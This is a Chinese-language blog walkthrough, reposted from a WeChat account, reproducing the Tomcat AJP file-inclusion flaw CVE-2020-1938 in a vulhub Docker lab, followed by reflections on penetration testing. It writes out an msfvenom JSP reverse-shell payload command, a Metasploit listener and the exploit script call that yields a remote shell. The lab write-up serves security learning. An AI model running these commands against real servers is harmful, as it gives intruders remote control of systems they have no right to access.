CVE-2020-1938漏洞复现

admin 2024年1月10日15:09:20评论14 views字数 1263阅读4分12秒阅读模式

一、环境搭建

机器:kali Linux

Java:jdk11

python:2.7.x

漏洞复现情景:https://github.com/vulhub/vulhub

二、用docker开启漏洞环境

笔者这里是修改了端口,一开始开启环境是默认端口应为8080

用docker-compose开启环境前,先安装docker和docker-compose

docker部署链接:

https://blog.csdn.net/m0_67844671/article/details/132872790

CVE-2020-1938漏洞复现

三、下载脚本

脚本下载地址:

https://github.com/fairyming/CVE-2020-1938

CVE-2020-1938漏洞复现

四、查看脚本用法

CVE-2020-1938漏洞复现

五、尝试利用脚本文件包含

CVE-2020-1938漏洞复现

六、利用msfvenom生成木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.217.128 LPORT=4444 R > muma.txt

CVE-2020-1938漏洞复现

七、利用docker复制木马进去容器内部模拟文件上传成功

docker cp muma.txt 188fb6f53492:/usr/local/tomcat/webapps/ROOT/muma.txt

CVE-2020-1938漏洞复现

上传成功如下图所示:

CVE-2020-1938漏洞复现

八、利用msfconsole开启监听

msfconsole

handler -p java/jsp_shell_reverse_tcp -H 0.0.0.0 -P 4444

CVE-2020-1938漏洞复现

九、利用脚本getshell

python2 CVE-2020-1938.py 192.168.217.128 -p 8009 -f /muma.txt -c 1

CVE-2020-1938漏洞复现

十、回到msfconsole查看是否有会话

CVE-2020-1938漏洞复现

如上图所示即反弹shell成功!

在进行渗透测试的过程中,我深刻体验到了网络安全领域的挑战和重要性。渗透测试是一项关键的活动,旨在评估系统、应用程序或网络的安全性,以及揭示其中存在的潜在漏洞。通过这次经历,我对网络安全的复杂性和不断演变的威胁有了更深刻的理解。

首先,渗透测试不仅仅是一项技术活动,更是一项需要不断学习和更新知识的任务。随着黑客技术的不断进步,安全专业人员需要保持对新威胁和漏洞的敏感性,并采取相应的防御措施。在这个过程中,我深感信息安全是一个日益紧迫的领域,需要持续不断地提高自身的技能水平。

其次,渗透测试让我更加了解攻击者可能采用的各种手段,包括利用软件漏洞、社会工程学和网络协议的不当使用。这种全面的了解不仅对于测试者在渗透测试中的角色至关重要,也有助于组织建立更加全面的安全策略,以防范潜在威胁。

在进行博客写作时,我感到分享这一经历对于推动网络安全意识的提升至关重要。通过将自己的经验分享给社区,我能够为其他安全从业者提供有价值的见解,并鼓励更多人投身于保护网络安全的事业。

总的来说,渗透测试是一个不断学习、挑战自我的过程,对于构建更加安全的数字世界发挥着至关重要的作用。通过这次体验,我深信投身网络安全领域是一个充满挑战但也充满乐趣的选择,而我的学习之旅还远未结束。

原文始发于微信公众号(黄公子学安全):CVE-2020-1938漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月10日15:09:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-1938漏洞复现https://cn-sec.com/archives/2337857.html

发表评论

匿名网友 填写信息